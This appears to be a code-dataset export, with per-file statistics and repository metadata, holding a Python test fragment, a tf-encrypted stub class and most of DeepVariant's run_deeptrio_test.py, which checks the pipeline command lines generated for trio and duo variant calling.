                         fabric='mmudigon',
                         config=self.playbook_config))
    result = None
    try:
        result = self.execute_module(changed=False, failed=False)
    except Exception:
        # Fix: the original bare 'except:' also swallowed KeyboardInterrupt
        # and SystemExit; the harness failure exceptions are Exception
        # subclasses, so narrowing preserves the test's behavior.
        self.assertEqual(result, None)
| 48.429655
| 136
| 0.598876
| 6,564
| 57,486
| 4.911639
| 0.038239
| 0.084677
| 0.08139
| 0.082506
| 0.938151
| 0.929001
| 0.913555
| 0.901365
| 0.876861
| 0.859988
| 0
| 0.034707
| 0.287774
| 57,486
| 1,186
| 137
| 48.470489
| 0.752729
| 0.066486
| 0
| 0.784409
| 0
| 0
| 0.171986
| 0.079555
| 0
| 0
| 0
| 0
| 0.221681
| 1
| 0.036541
| false
| 0.001218
| 0.00609
| 0
| 0.046285
| 0.001218
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54b3202a6b5750d675b0cca120c7416f9ef17a78
| 94
|
py
|
Python
|
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
from ..protocol import Protocol
class UnencryptedNative(Protocol):
    """Stub Protocol subclass — not yet implemented.

    NOTE(review): the name suggests computation on plaintext (unencrypted)
    values, but the body is empty; confirm intent before relying on this.
    """
    # TODO
    pass
| 11.75
| 34
| 0.680851
| 9
| 94
| 7.111111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255319
| 94
| 8
| 35
| 11.75
| 0.914286
| 0.042553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
49b68699f166eb37ec18d6505f7134a934e233d5
| 26,180
|
py
|
Python
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 2,553
|
2017-12-04T15:10:17.000Z
|
2022-03-24T09:05:14.000Z
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 501
|
2017-12-04T18:34:33.000Z
|
2022-03-31T13:30:50.000Z
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 730
|
2017-12-04T18:53:46.000Z
|
2022-03-29T03:33:11.000Z
|
# Copyright 2019 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Tests for deepvariant .run_deeptrio."""
import io
from unittest import mock
from absl import flags
from absl.testing import absltest
from absl.testing import flagsaver
from absl.testing import parameterized
import six
from deepvariant.opensource_only.scripts import run_deeptrio
FLAGS = flags.FLAGS
# pylint: disable=line-too-long
class RunDeeptrioTest(parameterized.TestCase):
  """Tests that run_deeptrio generates the expected command lines.

  Each test sets the run_deeptrio flags via FLAGS, calls
  run_deeptrio.create_all_commands, and asserts on the exact shell command
  strings that would be executed.
  """

  def _create_all_commands_and_check_stdout(self, expected_stdout=None):
    """Calls create_all_commands and verifies what was printed to stdout.

    Args:
      expected_stdout: If None, asserts that nothing was printed to stdout;
        otherwise asserts that stdout matches this string exactly.

    Returns:
      The (commands, postprocess_cmds) tuple from run_deeptrio.
    """
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
      commands, postprocess_cmds = run_deeptrio.create_all_commands(
          '/tmp/deeptrio_tmp_output')
      # Confirm that these basic commands don't have extra messages printed out
      # to stdout.
      if expected_stdout is None:
        self.assertEmpty(mock_stdout.getvalue())
      else:
        self.assertEqual(mock_stdout.getvalue(), expected_stdout)
      return commands, postprocess_cmds

  @parameterized.parameters('WGS', 'WES', 'PACBIO')
  @flagsaver.flagsaver
  def test_call_variants_postprocess_variants_commands(self, model_type):
    """Checks call_variants/postprocess_variants commands for a full trio."""
    FLAGS.model_type = model_type
    FLAGS.ref = 'your_ref'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.output_gvcf_merged = 'your_gvcf_merged'
    FLAGS.num_shards = 64
    commands, postprocess_cmds = self._create_all_commands_and_check_stdout()
    # One call_variants command per trio member; the child uses the child
    # checkpoint, both parents share the parent checkpoint.
    self.assertEqual(
        commands[1], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/{}/child/model.ckpt"'.format(
            model_type.lower()))
    self.assertEqual(
        commands[2], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_parent1.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
            model_type.lower()))
    self.assertEqual(
        commands[3], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent2.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_parent2.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
            model_type.lower()))
    self.assertEqual(
        postprocess_cmds[0], 'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--outfile "your_vcf_child" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_child"')
    self.assertEqual(
        postprocess_cmds[1], 'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
        '--outfile "your_vcf_parent1" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_parent1.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_parent1"')
    self.assertEqual(
        postprocess_cmds[2], 'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent2.tfrecord.gz" '
        '--outfile "your_vcf_parent2" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_parent2.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_parent2"')
    self.assertLen(commands, 4)
    self.assertLen(postprocess_cmds, 3)

  @parameterized.parameters('WGS', 'WES', 'PACBIO')
  @flagsaver.flagsaver
  def test_duo_call_variants_postprocess_variants_commands(self, model_type):
    """Checks call_variants/postprocess_variants commands for a duo.

    With only one parent provided, one fewer call_variants and
    postprocess_variants command should be generated.
    """
    FLAGS.model_type = model_type
    FLAGS.ref = 'your_ref'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_merged = 'your_gvcf_merged'
    FLAGS.num_shards = 64
    commands, postprocess_cmds = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands[1], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/{}/child/model.ckpt"'.format(
            model_type.lower()))
    self.assertEqual(
        commands[2], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_parent1.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
            model_type.lower()))
    self.assertEqual(
        postprocess_cmds[0], 'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--outfile "your_vcf_child" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_child"')
    self.assertEqual(
        postprocess_cmds[1], 'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
        '--outfile "your_vcf_parent1" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_parent1.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_parent1"')
    # pylint: disable=g-generic-assert
    self.assertLen(commands, 3)
    self.assertLen(postprocess_cmds, 2)

  @parameterized.parameters(
      ('WGS', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '),
      ('WES', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--pileup_image_height_child "100" '
       '--pileup_image_height_parent "100" '),
      ('PACBIO', '--add_hp_channel '
       '--alt_aligned_pileup "diff_channels" '
       '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--noparse_sam_aux_fields '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--pileup_image_width "199" '
       '--norealign_reads '
       '--nosort_by_haplotypes '
       '--vsc_min_fraction_indels "0.12" '))
  @flagsaver.flagsaver
  def test_make_examples_commands_with_types(self, model_type,
                                             extra_args_plus_gvcf):
    """Checks the make_examples command and its model-type-specific flags."""
    FLAGS.model_type = model_type
    FLAGS.ref = 'your_ref'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.output_gvcf_merged = 'your_gvcf_merged'
    FLAGS.num_shards = 64
    commands, _ = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands[0], 'time seq 0 63 '
        '| parallel -q --halt 2 --line-buffer '
        '/opt/deepvariant/bin/deeptrio/make_examples '
        '--mode calling '
        '--ref "your_ref" '
        '--reads_parent1 "your_bam_parent1" '
        '--reads_parent2 "your_bam_parent2" '
        '--reads "your_bam_child" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
        '--sample_name "your_sample_child" '
        '--sample_name_parent1 "your_sample_parent1" '
        '--sample_name_parent2 "your_sample_parent2" '
        '%s'
        '--task {}' % extra_args_plus_gvcf)

  @parameterized.parameters(
      ('WGS', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '),
      ('WES', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--pileup_image_height_child "100" '
       '--pileup_image_height_parent "100" '),
      ('PACBIO', '--add_hp_channel '
       '--alt_aligned_pileup "diff_channels" '
       '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--noparse_sam_aux_fields '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--pileup_image_width "199" '
       '--norealign_reads '
       '--nosort_by_haplotypes '
       '--vsc_min_fraction_indels "0.12" '))
  @flagsaver.flagsaver
  def test_duo_make_examples_commands_with_types(self, model_type,
                                                 extra_args_plus_gvcf):
    """Checks the make_examples command for a duo (no parent2 flags)."""
    FLAGS.model_type = model_type
    FLAGS.ref = 'your_ref'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_merged = 'your_gvcf_merged'
    FLAGS.num_shards = 64
    commands, _ = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands[0], 'time seq 0 63 '
        '| parallel -q --halt 2 --line-buffer '
        '/opt/deepvariant/bin/deeptrio/make_examples '
        '--mode calling '
        '--ref "your_ref" '
        '--reads_parent1 "your_bam_parent1" '
        '--reads "your_bam_child" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
        '--sample_name "your_sample_child" '
        '--sample_name_parent1 "your_sample_parent1" '
        '%s'
        '--task {}' % extra_args_plus_gvcf)

  @parameterized.parameters(
      (None, '--add_hp_channel '
       '--alt_aligned_pileup "diff_channels" '
       '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--noparse_sam_aux_fields '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--pileup_image_width "199" '
       '--norealign_reads '
       '--nosort_by_haplotypes '
       '--vsc_min_fraction_indels "0.12" ', None),
      ('alt_aligned_pileup="rows",vsc_min_fraction_indels=0.03',
       '--add_hp_channel '
       '--alt_aligned_pileup "rows" '
       '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
       '--noparse_sam_aux_fields '
       '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--pileup_image_width "199" '
       '--norealign_reads '
       '--nosort_by_haplotypes '
       '--vsc_min_fraction_indels "0.03" ',
       '\nWarning: --alt_aligned_pileup is previously set to diff_channels, '
       'now to "rows".\n'
       '\nWarning: --vsc_min_fraction_indels is previously set to 0.12, '
       'now to 0.03.\n'),
  )
  @flagsaver.flagsaver
  def test_pacbio_args_overwrite(self, make_examples_extra_args, expected_args,
                                 expected_stdout):
    """Confirms that adding extra flags can overwrite the default from mode."""
    FLAGS.model_type = 'PACBIO'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.regions = None
    FLAGS.make_examples_extra_args = make_examples_extra_args
    commands, _ = self._create_all_commands_and_check_stdout(expected_stdout)
    self.assertEqual(
        commands[0], 'time seq 0 63 | parallel -q --halt 2 --line-buffer '
        '/opt/deepvariant/bin/deeptrio/make_examples --mode calling '
        '--ref "your_ref" --reads_parent1 "your_bam_parent1" '
        '--reads_parent2 "your_bam_parent2" '
        '--reads "your_bam_child" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
        '--sample_name "your_sample_child" '
        '--sample_name_parent1 "your_sample_parent1" '
        '--sample_name_parent2 "your_sample_parent2" '
        '%s'
        '--task {}' % expected_args)

  @parameterized.parameters(
      (None, ('sort_by_haplotypes=true,parse_sam_aux_fields=true'), True),
      (True, ('sort_by_haplotypes=true,parse_sam_aux_fields=true'), False),
  )
  @flagsaver.flagsaver
  def test_use_hp_information_conflicts(self, use_hp_information,
                                        make_examples_extra_args, has_conflict):
    """Confirms that PacBio use_hp_information can conflict with HP args."""
    FLAGS.model_type = 'PACBIO'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.regions = None
    FLAGS.use_hp_information = use_hp_information
    FLAGS.make_examples_extra_args = make_examples_extra_args
    if has_conflict:
      with six.assertRaisesRegex(self, ValueError,
                                 'conflicts with other flags'):
        run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')
    else:
      # Otherwise, the command should run without raising errors.
      run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')

  @parameterized.parameters('WGS', 'WES')
  @flagsaver.flagsaver
  def test_use_hp_information_only_with_pacbio(self, model_type):
    """Confirms use_hp_information only works for the PACBIO model type."""
    FLAGS.model_type = model_type
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.regions = None
    FLAGS.use_hp_information = True
    with six.assertRaisesRegex(
        self, ValueError, '--use_hp_information can only be used with '
        '--model_type="PACBIO"'):
      run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')

  @parameterized.parameters(
      ('chr1:20-30', '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--regions "chr1:20-30"'),
      ('chr1:20-30 chr2:100-200', '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       '--regions "chr1:20-30 chr2:100-200"'),
      ("'chr1:20-30 chr2:100-200'", '--pileup_image_height_child "60" '
       '--pileup_image_height_parent "40" '
       "--regions 'chr1:20-30 chr2:100-200'"),
  )
  @flagsaver.flagsaver
  def test_make_examples_regions(self, regions, expected_args):
    """Checks that --regions is passed through to make_examples.

    NOTE: the @flagsaver.flagsaver decorator was previously missing here,
    unlike every sibling test, so the FLAGS assignments below leaked into
    other test cases. It is now applied to restore FLAGS after the test.
    """
    FLAGS.model_type = 'WGS'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.regions = regions
    commands, _ = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands[0], 'time seq 0 63 | parallel -q --halt 2 --line-buffer '
        '/opt/deepvariant/bin/deeptrio/make_examples --mode calling '
        '--ref "your_ref" --reads_parent1 "your_bam_parent1" '
        '--reads_parent2 "your_bam_parent2" '
        '--reads "your_bam_child" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
        '--sample_name "your_sample_child" '
        '--sample_name_parent1 "your_sample_parent1" '
        '--sample_name_parent2 "your_sample_parent2" '
        '%s '
        '--task {}' % expected_args)

  @flagsaver.flagsaver
  def test_make_examples_extra_args_invalid(self):
    """Checks that malformed make_examples_extra_args raise a ValueError."""
    FLAGS.model_type = 'WGS'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    # Missing the '=value' part, so splitting into key/value pairs fails.
    FLAGS.make_examples_extra_args = 'keep_secondary_alignments'
    with six.assertRaisesRegex(self, ValueError, 'not enough values to unpack'):
      _, _ = run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')

  @parameterized.parameters(
      ('batch_size=1024', '--batch_size "1024"'),
      ('batch_size=4096,'
       'config_string="gpu_options: {per_process_gpu_memory_fraction: 0.5}"',
       '--batch_size "4096" '
       '--config_string "gpu_options: {per_process_gpu_memory_fraction: 0.5}"'),
  )
  @flagsaver.flagsaver
  def test_call_variants_extra_args(self, call_variants_extra_args,
                                    expected_args):
    """Checks that call_variants_extra_args are appended to the command."""
    FLAGS.model_type = 'WGS'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.call_variants_extra_args = call_variants_extra_args
    commands, _ = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands[1], 'time /opt/deepvariant/bin/call_variants '
        '--outfile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
        '--checkpoint "/opt/models/deeptrio/wgs/child/model.ckpt" '
        '%s' % expected_args)

  @parameterized.parameters(
      ('qual_filter=3.0', '--qual_filter "3.0"'),)
  @flagsaver.flagsaver
  def test_postprocess_variants_extra_args(self,
                                           postprocess_variants_extra_args,
                                           expected_args):
    """Checks that postprocess_variants_extra_args are appended."""
    FLAGS.model_type = 'WGS'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.postprocess_variants_extra_args = postprocess_variants_extra_args
    _, commands_post_process = self._create_all_commands_and_check_stdout()
    self.assertEqual(
        commands_post_process[0],
        'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--outfile "your_vcf_child" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_child" '
        '%s' % expected_args)

  @parameterized.parameters(
      (True, 'vcf_stats_report=true', '--vcf_stats_report'),
      (True, 'vcf_stats_report=false', '--novcf_stats_report'),
      # These two cases demonstrate we might end up having duplicated and
      # potentially conflicting flags when using *extra_args.
      (False, 'vcf_stats_report=true', '--novcf_stats_report --vcf_stats_report'
      ),
      (False, 'vcf_stats_report=false',
       '--novcf_stats_report --novcf_stats_report'),
  )
  @flagsaver.flagsaver
  def test_postprocess_variants_duplicate_extra_args(
      self, vcf_stats_report, postprocess_variants_extra_args,
      expected_vcf_stats_report):
    """Checks how --vcf_stats_report interacts with duplicated extra args."""
    FLAGS.model_type = 'WGS'
    FLAGS.ref = 'your_ref'
    FLAGS.sample_name_child = 'your_sample_child'
    FLAGS.sample_name_parent1 = 'your_sample_parent1'
    FLAGS.sample_name_parent2 = 'your_sample_parent2'
    FLAGS.reads_child = 'your_bam_child'
    FLAGS.reads_parent1 = 'your_bam_parent1'
    FLAGS.reads_parent2 = 'your_bam_parent2'
    FLAGS.output_vcf_child = 'your_vcf_child'
    FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
    FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
